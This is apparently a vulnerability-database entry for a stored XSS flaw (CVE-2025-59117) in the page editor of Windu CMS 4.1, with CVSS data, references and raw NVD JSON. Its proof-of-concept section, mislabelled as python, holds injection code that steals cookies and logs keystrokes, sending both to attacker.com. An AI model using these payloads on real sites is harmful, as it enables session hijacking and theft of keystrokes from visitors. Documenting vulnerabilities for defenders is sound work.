CVE-2025-59117

Description

Windu CMS is vulnerable to multiple Stored Cross-Site Scripting (XSS) vulnerabilities in the page editing endpoint windu/admin/content/pages/edit/. This vulnerability can be exploited by a privileged user and may target users with higher privileges. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE

Windu CMS 4.1 < build 2250

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-59117 PoC - Windu CMS Stored XSS
// Target: Windu CMS 4.1 (windu/admin/content/pages/edit/)

// 1. Login to Windu CMS admin panel with high-privilege account
// 2. Navigate to: /windu/admin/content/pages/edit/
// 3. In page content field, inject XSS payload:

const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// 4. Save the page
// 5. When any user visits the affected page, the script executes

// Example exploitation with cookie stealing:
const exploitCode = `
<script>
  // Steal session cookies
  document.write('<img src="https://attacker.com/log?cookie='+encodeURIComponent(document.cookie)+'">');
  
  // Keylogger example
  document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/log?key='+e.key);
  });
</script>
`;

// POST request to inject:
fetch('/windu/admin/content/pages/edit/', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: 'content=' + encodeURIComponent(exploitCode) + '&save=1'
});

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59117
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59117
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59117/
[4] VulDB https://vuldb.com/cve/CVE-2025-59117
[5] https://cert.pl/posts/2025/11/CVE-2025-59110
[6] https://windu.org

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59117", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:34.337", "lastModified": "2025-12-05T13:16:04.763", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to multiple Stored Cross-Site Scripting (XSS) vulnerabilities in the page editing endpoint windu/admin/content/pages/edit/. \nThis vulnerability can be exploited by a privileged user and may target users with higher privileges.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org", "source": "[email protected]", "tags": ["Product"]}]}}